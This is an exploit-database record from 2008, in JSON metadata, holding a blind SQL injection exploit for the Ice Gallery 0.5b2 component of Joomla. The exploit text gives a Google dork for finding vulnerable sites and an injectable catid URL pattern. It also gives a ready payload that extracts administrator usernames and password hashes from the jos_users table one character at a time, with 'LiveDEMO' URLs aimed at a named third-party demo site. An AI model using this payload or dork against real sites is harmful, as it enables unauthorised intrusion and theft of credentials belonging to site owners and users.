Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln

2008-12-24T00:00:00

Description

Exploit for unknown platform in category web applications

{"id": "1337DAY-ID-4540", "type": "zdt", "bulletinFamily": "exploit", "title": "Joomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln", "description": "Exploit for unknown platform in category web applications", "published": "2008-12-24T00:00:00", "modified": "2008-12-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://0day.today/exploit/description/4540", "reporter": "boom3rang", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-04-08T23:40:58", "viewCount": 14, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.4}, "sourceHref": "https://0day.today/exploit/4540", "sourceData": "===================================================================\r\nJoomla Component Ice Gallery 0.5b2 (catid) Blind SQL Injection Vuln\r\n===================================================================\r\n\r\n\r\n#############################################################\r\nJoomla Component com_ice(catid) Blind SQL-injection\r\n#############################################################\r\n\r\n\r\n###################################################\r\n#[~] Author : boom3rang \r\n#[~] Greetz : [email\u00a0protected], KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.\r\n#[~] Vulnerability : Blind SQL injection \r\n#[~] Google Dork : inurl:com_ice \"catid\"\r\n--------------------------------------------------\r\n#[!] <name>Ice Gallery</name>\r\n#[!] <creationDate>29/08/06</creationDate>\r\n#[!] <author>Markus Donhauser</author>\r\n#[!] <version>0.5 beta 2</version>\r\n###################################################\r\n\r\nExample:\r\nhttp://localHost/path/index.php?option=com_ice&catid=1[SQL code]\r\n\r\n\r\nSQL code:\r\nand ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96\r\n\r\n\r\nLiveDEMO:\r\n\r\nhttp://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=4 >>(False)\r\n\r\nhttp://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and substring(@@version,1,1)=5 >>(True)\r\n\r\nhttp://www.komponenten.joomlademo.de/index.php?option=com_ice&catid=1 and ascii(substring((SELECT concat(username,0x3a,password) from jos_users limit 0,1),1,1))>96\r\n\r\n\r\n\n# 0day.today [2018-04-08] #", "_state": {"dependencies": 1645248371, "score": 1659766679}}